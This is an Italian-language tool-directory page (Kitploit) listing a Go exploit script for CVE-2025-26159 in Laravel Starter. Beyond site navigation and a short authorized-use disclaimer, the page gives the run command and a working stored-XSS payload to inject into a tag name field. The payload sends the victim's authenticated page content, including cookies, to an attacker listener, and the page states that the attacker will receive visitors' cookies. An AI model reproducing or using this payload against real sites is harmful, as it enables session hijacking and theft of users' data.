Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-26159 — Script di exploit basato su Go per CVE-2025-26159 che decodifica, filtra ed estrae i cookie dalle applicazioni Laravel tramite iniezione di payload XSS memorizzato. | Kitploit
Strumenti/GitHubGitHub/godbadtry/cve-2025-26159
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubgodbadtry/cve-2025-26159

CVE-2025-26159

Script di exploit basato su Go per CVE-2025-26159 che decodifica, filtra ed estrae i cookie dalle applicazioni Laravel tramite iniezione di payload XSS memorizzato.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-26159

Questo script può essere utilizzato solo in ambienti autorizzati in cui è stato concesso esplicito permesso. L'autore non è responsabile per qualsiasi uso improprio, danno o conseguenze derivanti dall'utilizzo di questo script.

Questo script decodifica, filtra ed estrae cookie come parte dello sfruttamento di CVE-2025-26159.

Utilizzo

Per comprendere i passaggi di sfruttamento, dai un'occhiata a questo articolo sul mio blog.

go run CVE-2025-26159.go

Nel campo del nome del tag di Laravel Starter, inserisci questo payload:

<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

Dopo che un utente visita la pagina dei dettagli del tag dannoso, riceverai i suoi cookie.

Scarica lo strumento